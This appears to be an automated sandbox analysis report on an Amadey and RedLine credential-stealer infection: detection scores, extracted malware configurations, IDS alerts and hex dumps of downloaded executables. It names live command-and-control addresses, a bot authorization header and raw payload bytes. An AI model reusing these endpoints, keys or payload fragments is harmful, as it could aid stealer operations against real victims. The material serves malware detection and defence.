                          Source: http://185.81.68.148/8Fvu5jh4DbS/index.php(Avira URL Cloud: Label: phishing
                          Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpAvira URL Cloud: Label: malware
                          Source: 00000005.00000003.1588276592.000000000A1EE000.00000004.00000001.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}
                          Source: 17.0.6148.tmp.ssg.exe.7b0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\clip64[1].dllReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\cred64[1].dllReversingLabs: Detection: 34%
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeReversingLabs: Detection: 28%
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\AppData\Local\Temp\6B1D.tmp.update.exeReversingLabs: Detection: 55%
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeReversingLabs: Detection: 65%
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeReversingLabs: Detection: 65%
                          Source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllReversingLabs: Detection: 34%
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeReversingLabs: Detection: 55%
                          Source: mggoBrtk9t.exeReversingLabs: Detection: 55%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\6B1D.tmp.update.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeJoe Sandbox ML: detected
                          Source: mggoBrtk9t.exeJoe Sandbox ML: detected
                          Source: mggoBrtk9t.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525826134.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526540586.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514700090.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513867334.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: ucrtbase.pdb source: 56C7.tmp.ctx.exe, 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmp
                          Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1521485641.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514287151.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513327898.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524266099.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525412258.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526711457.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 56C7.tmp.ctx.exe, 00000010.00000002.1552781026.00007FFEF6561000.00000002.00000001.01000000.0000000D.sdmp
                          Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1516604670.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524630486.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1523917344.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1512658060.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525233426.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514393425.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcruntime140.amd64.pdbGCTL source: 56C7.tmp.ctx.exe, 0000000B.00000003.1512340032.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1552964109.00007FFEF6C9E000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1522257553.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514055040.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514520918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525045977.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1533732918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1522655585.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: ucrtbase.pdbUGP source: 56C7.tmp.ctx.exe, 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmp
                          Source: Binary string: vcruntime140.amd64.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1512340032.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1552964109.00007FFEF6C9E000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1527207140.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1515940882.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524081163.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1521949636.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514165152.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524822647.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 56C7.tmp.ctx.exe, 00000010.00000002.1551864143.00007FFEDDACD000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526087682.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1520566936.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1522426351.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1521751847.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1527462730.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1523349251.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1524425384.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1523632509.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1514869646.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526341580.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1517867226.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1517222458.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1534857194.000001B344028000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1525608468.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 56C7.tmp.ctx.exe, 0000000B.00000003.1526969179.000001B34401F000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,11_2_00007FF7102C79B0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C85A0 FindFirstFileExW,FindClose,11_2_00007FF7102C85A0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00007FF7102E0B84
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C85A0 FindFirstFileExW,FindClose,16_2_00007FF7102C85A0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00007FF7102C79B0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00007FF7102E0B84
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE23303C FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FFEEE23303C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE233280 FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FFEEE233280
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004EF661 FindFirstFileExW,18_2_004EF661
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0033F661 FindFirstFileExW,19_2_0033F661
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0033F661 FindFirstFileExW,20_2_0033F661
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.ini
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.ini
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.ini

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.11:49760 -> 185.81.68.147:1912
                          Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.11:49760 -> 185.81.68.147:1912
                          Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.11:49760
                          Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.11:49760
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.11:49939 -> 185.81.68.147:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49946 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.11:49978 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.11:49973 -> 185.81.68.147:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49970 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49998 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.11:49983 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.11:49983 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50036 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50017 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50056 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50073 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50095 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50088 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50103 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50126 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50142 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50165 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50171 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50080 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50186 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50194 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50110 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50118 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50179 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50201 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50156 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50149 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50209 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.11:49972 -> 185.81.68.147:80
                          Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.11:49977 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.11:49982 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.11:49982 -> 185.81.68.148:80
                          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50134 -> 185.81.68.148:80
                          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80
                          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80
                          Source: Malware configuration extractorIPs: 185.81.68.148
                          Source: Malware configuration extractorURLs: 185.81.68.147:1912
                          Source: global trafficTCP traffic: 192.168.2.11:49760 -> 185.81.68.147:1912
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 15:18:48 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 10 Dec 2024 15:45:48 GMTETag: "5a452c-628ec5ffff268"Accept-Ranges: bytesContent-Length: 5915948Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f 5a 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 15:18:59 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 